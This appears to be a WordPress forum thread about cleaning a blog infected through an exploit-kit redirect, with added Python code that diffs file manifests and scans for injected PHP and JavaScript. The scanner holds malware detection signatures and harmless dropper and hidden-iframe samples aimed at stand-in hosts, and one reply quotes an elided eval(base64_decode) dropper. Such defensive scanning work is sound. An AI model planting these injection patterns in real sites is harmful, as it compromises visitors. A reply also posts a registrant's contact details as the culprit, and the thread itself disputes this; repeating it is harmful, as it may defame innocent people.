• My blog is infected with malware on the site. I have changed my password and installed the WPMalwatch. It was run and found nothing.
    Some of the links my readers are seeing on the sign that pops up as a warning are:
    Threat Name: Exploit Phoenix Exploit Kit (Type 1112)
    File Name: decorum76.info/e9t/
    And:
    “The website at https://www.halfasstic.com contains elements from the site novelounge.com, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
    For detailed information about the problems with these elements, visit the Google safe browsing diagnostic page for novelounge.com.”

    1. Can anyone tell me what to do to get this off of my blog?
    2. If this is something that is over my head, who can I hire to do it for me?
    Thanks so much!

Viewing 10 replies - 16 through 25 (of 25 total)
Luckily MT fellers have reacted right in time I’d say, although a couple of our visitors might have been kicked away from our loved WordPress blogs and sites.

They’ve come up with a very easy solution.

    Here’s full details on this matter: https://wiki.mediatemple.net/w/WordPress_Redirect_Exploit

    Carry on WordPressing friends.

    None of my sites had the malicious code in the wp_posts table as MT warned. I did, however, have the Malware Detected! warning in Chrome. I’ve managed to clean my sites. Here are the steps I took:

    1. Upgrade to WP 3.0
    2. Delete the “JohnnyA” admin user (this was the only variation I saw, though there may be others.)
    3. Scan all of the theme files for malicious code. 95% of the time the code was found on a standard theme file (such as header.php), but I did find it on some custom template files as well. On one site I found the code buried inside of an old “Statcounter” script.
    4. Go to https://jsunpack.jeek.org/dec/go and scan the site for code inserted in plugins or the wp-includes folder. It was usually found in the Google Analyticator or Cryptx plugins (which I simply deleted and re-installed). In other instances, it was in the wp-includes jquery or thickbox files.
5. Delete the wp-super-cache cache, and it’s back to normal.

    For good measure I changed admin and db passwords, but the sites I haven’t changed yet haven’t had a recurrence. While this has been a hassle, it’s gotten me off my butt to lock down the security on all my sites.

    I’ve had the same issue, and believe there is a back door somewhere in my client’s WordPress installation. I installed the WordPress File Monitor plugin after the initial hacking, and it alerted me today that more malicious files were added yesterday, despite removing all malicious code previously.

    I also discovered that two plugins were installed and activated that I did not put there: “Redirect” for redirecting via custom fields and “Search & Replace” for replacing strings in the database.

    I’m biting the bullet and doing a fresh WordPress installation, along with repeating all the password changes, etc. I’ve already done.
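The file-change check that reply relies on, done by hand rather than with the WordPress File Monitor plugin. This is an added example, not code from the thread or from that plugin: it takes a SHA-256 manifest of a known-clean tree and diffs the live tree against it, so files a backdoor re-adds or re-modifies show up even when a signature scan misses them. The directory layout, file contents and the ignored cache/uploads directories are constructed assumptions.

```python
import hashlib
import os
import tempfile

# Directories WordPress rewrites in normal operation; changes there are noise.
IGNORE_DIRS = {"cache", "uploads"}  # assumption: adjust for your site


def manifest(root):
    """Map relative path -> sha256 hex digest for every file under root."""
    result = {}
    for dirpath, dirnames, files in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in IGNORE_DIRS]
        for f in files:
            path = os.path.join(dirpath, f)
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            result[rel] = h.hexdigest()
    return result


def diff_manifests(baseline, current):
    """Return added / modified / removed relative paths between two manifests."""
    both = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "modified": sorted(p for p in both if baseline[p] != current[p]),
        "removed": sorted(set(baseline) - set(current)),
    }


def _write(root, rel, body):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(body)


def demo():
    """Baseline a constructed clean site, simulate the backdoor's overnight
    changes, and report what differs. Returns the diff."""
    with tempfile.TemporaryDirectory() as root:
        # site right after cleanup (constructed sample)
        _write(root, "wp-includes/js/jquery/jquery.js", "/* jquery */\n")
        _write(root, "wp-content/themes/mytheme/header.php", "<head></head>\n")
        _write(root, "wp-content/cache/page.html", "cached\n")
        clean = manifest(root)
        # what the backdoor does later (constructed): re-infect jquery.js,
        # drop a plugin the owner never installed, churn the cache
        _write(root, "wp-includes/js/jquery/jquery.js",
               "/* jquery */\ndocument.write(unescape('%3Ciframe'));\n")
        _write(root, "wp-content/plugins/redirect/redirect.php",
               "<?php // not installed by the owner\n")
        _write(root, "wp-content/cache/page.html", "cached again\n")
        changes = diff_manifests(clean, manifest(root))
    for kind, paths in changes.items():
        for p in paths:
            print(f"{kind}: {p}")
    return changes


if __name__ == "__main__":
    demo()
```

Store the clean manifest off the server (the attacker can edit anything on the web host) and re-run the diff from cron; the cache churn is filtered out, while the re-infected library and the dropped plugin are reported.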

    You all seem to have lucked out. I have changed database passwords, WordPress login passwords, deleted the admin users that shouldn’t have been on there. All of the above and the frickin’ thing keeps coming back. I have 11 sites based on WordPress and five of them are infected. The thought of having to redo all the customisation etc. is killing me.

Thanks Roy, I think it’s going to be best to start from scratch again. Wipe directories and databases and start afresh. I can copy the text and images down; the last thing we need is anyone getting the malware message, though the one saving grace is that the sites infected are for annual events and are very rarely read at other times of the year.

I’ll leave it to you to judge what’s least work. Be aware of images though. Hacks often contain bogus JPGs.

    Okay, a few of my websites and sites that I manage for others were hacked from the same ideacoreportal.com. All were on different servers, different accounts, different passwords, etc. One of them was a MediaTemple server.

    How exactly can we report or have that company stopped from what they are doing?

    The following company also owns these domains that were part of the redirect script: [“edisonsnightclub.com”,”gaindirectory.org”,”ideacoreportal.com”,”karenegren.com”]

    Registrant:
       IDEACore LLC
       22552 King Richard Ct.
       Beverly Hills, Michigan 48025
       United States
    
       Domain Name: IDEACOREPORTAL.COM
          Created on: 14-Jan-05
          Expires on: 14-Jan-11
          Last Updated on: 15-Jan-10
    
       Administrative Contact:
          Craig, Joseph
          IDEACore LLC
          22552 King Richard Ct.
          Beverly Hills, Michigan 48025
          United States
          2484333380      Fax -- 
    
       Technical Contact:
          Craig, Joseph
          IDEACore LLC
          22552 King Richard Ct.
          Beverly Hills, Michigan 48025
          United States
          2484333380      Fax -- 
    
       Domain servers in listed order:
          NS51.DOMAINCONTROL.COM
          NS52.DOMAINCONTROL.COM

    Sahaskatta, these assumptions are all wrong, it’s an acknowledged hack of servers that were not in the possession or control of the people or entities you list above. The owners of the domains are definitely not complicit, nor was it likely that the originating poster was.

The Phoenix Exploit Kit has been implicated in issues in the realm of these posts.

    See https://community.websense.com/blogs/securitylabs/archive/2010/08/05/Media-Temple-injections-lead-to-Phoenix-Exploit-Kit.aspx

    and https://blogs.computerworld.com/16904/mass_injections_and_malware_continue_at_media_temple

It’s not a good idea, or fair, to place the data above in a blog post when you’re not certain about the facts, as erroneous information defames the parties.

As much as you want to “have that company stopped”, the ones you unwittingly think are behind this probably want to stop you or Skattertech from spreading false impressions.

    Someone attempted to maliciously point those domains to a hacked server, but the domains and contacts you list were surely not complicit. This could even be a registrar breach.

    The domains above don’t show any involvement with this attack and are clean.

    Sahaskatta and zackisaiah – to be fair and more important, to be accurate, you should remove these errant publications of opinions/assumptions about the domains and registrants.

    Just removed malicious code from my site https://www.onsiteiphonerepairs.co.uk found in SEO plugin:

eval(base64_decode("..."));?>
<?php

    Hope this helps someone!
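An offline scanner for the injected code described in this thread, serving both the cleanup steps listed in the earlier reply (malicious code in theme files, plugins and wp-includes JavaScript) and the eval(base64_decode(...)) dropper quoted in the reply just above. This is an added example, not code from the thread: it flags eval(base64_decode(...)) and eval(gzinflate(base64_decode(...))) in PHP files, hidden iframes and <script src> tags that load from hosts other than your own, and document.write(unescape(...)) appended to library files, and it decodes an eval() payload layer by layer without running it. The signatures, the example.com / example.invalid hostnames and the sample files are the example's own constructed assumptions, not an exhaustive signature set.

```python
import base64
import os
import re
import tempfile
import zlib

SIGNATURES = {
    # PHP dropper: eval(base64_decode(...)) or eval(gzinflate(base64_decode(...)))
    "php_eval_base64": re.compile(
        r"eval\s*\(\s*(?:gzinflate\s*\(\s*)?base64_decode\s*\(", re.I),
    # iframe made invisible, the usual carrier for an exploit-kit landing page
    "hidden_iframe": re.compile(
        r"<iframe[^>]*(?:display\s*:\s*none|visibility\s*:\s*hidden|width=[\"']?0\b)", re.I),
    # obfuscated JavaScript appended to library files such as jquery.js
    "js_document_write_unescape": re.compile(
        r"document\.write\s*\(\s*unescape\s*\(", re.I),
}
SCRIPT_SRC = re.compile(r"<script[^>]+src=[\"']https?://([^/\"']+)", re.I)
B64_ARG = re.compile(r"base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=\s]+)[\"']")
SCAN_EXT = {".php", ".js", ".html", ".htm"}


def scan_text(text, name, own_hosts=()):
    """Return (file, signature, line) for every hit in one file's contents."""
    own = {h.lower() for h in own_hosts}
    hits = []
    for sig, rx in SIGNATURES.items():
        for m in rx.finditer(text):
            hits.append((name, sig, text.count("\n", 0, m.start()) + 1))
    for m in SCRIPT_SRC.finditer(text):  # scripts loaded from other hosts
        host = m.group(1).lower()
        if host not in own:
            hits.append((name, "external_script_src:" + host,
                         text.count("\n", 0, m.start()) + 1))
    return hits


def scan_tree(root, own_hosts=()):
    """Walk a WordPress tree and scan every PHP/JS/HTML file."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if os.path.splitext(f)[1].lower() not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, f)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits.extend(scan_text(fh.read(), rel, own_hosts))
    return sorted(hits)


def decode_layers(php, max_depth=5):
    """Peel eval(base64_decode(...)) / gzinflate layers off a dropper to see
    the PHP it would run. Decodes only; nothing is executed."""
    cur = php
    for _ in range(max_depth):
        m = B64_ARG.search(cur)
        if not m:
            break
        payload = base64.b64decode(re.sub(r"\s+", "", m.group(1)))
        if re.search(r"gzinflate\s*\(\s*$", cur[:m.start()], re.I):
            payload = zlib.decompress(payload, -15)  # gzinflate == raw DEFLATE
        cur = payload.decode("latin-1")
    return cur


# --- constructed samples (harmless stand-ins, not real malware) ------------
def _b64(data):
    return base64.b64encode(data).decode("ascii")

def _gzdeflate(data):
    co = zlib.compressobj(wbits=-15)
    return co.compress(data) + co.flush()

FINAL = b'echo "owned";'
# dropper squeezed in before the plugin's real opening tag, the shape quoted above
INFECTED_PLUGIN = '<?php eval(base64_decode("%s"));?>\n<?php\n// plugin code\n' % _b64(FINAL)
NESTED_PLUGIN = '<?php eval(gzinflate(base64_decode("%s")));?>' % _b64(
    _gzdeflate(b'eval(base64_decode("%s"));' % _b64(FINAL).encode()))
INFECTED_JS = ('jQuery.fn.x=1;\ndocument.write(unescape("%3Ciframe%20src%3D%22'
               'http%3A//cdn.example.invalid/e9t/%22%3E"));\n')
INFECTED_HEADER = ('<head>\n<script src="http://www.example.com/js/site.js"></script>\n'
                   '<script src="http://cdn.example.invalid/stat.js"></script>\n'
                   '<iframe src="http://cdn.example.invalid/e9t/" style="display:none"></iframe>\n'
                   '</head>\n')
CLEAN_FOOTER = '<?php wp_footer(); ?>\n</body></html>\n'
SAMPLE_SITE = {
    "wp-content/plugins/seo/seo.php": INFECTED_PLUGIN,
    "wp-content/plugins/stats/stats.php": NESTED_PLUGIN,
    "wp-includes/js/jquery/jquery.js": INFECTED_JS,
    "wp-content/themes/mytheme/header.php": INFECTED_HEADER,
    "wp-content/themes/mytheme/footer.php": CLEAN_FOOTER,
}


def demo():
    """Write the samples to a temp dir, scan it, print and return the hits."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE_SITE.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        hits = scan_tree(root, own_hosts=("www.example.com",))
    for name, sig, line in hits:
        print(f"{name}:{line}: {sig}")
    return hits


if __name__ == "__main__":
    demo()
    print("dropper runs:", decode_layers(NESTED_PLUGIN))
```

Run it against a copy of the site with own_hosts set to the hostnames you legitimately serve scripts from; every hit should be compared against a fresh copy of the same plugin, theme or wp-includes file, and a dropper's decoded payload tells you what else (new admin users, extra plugins) to look for. A clean scan does not prove the site is clean; that is what the integrity diff and a fresh install are for.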

  • The topic ‘Blog infected with malware’ is closed to new replies.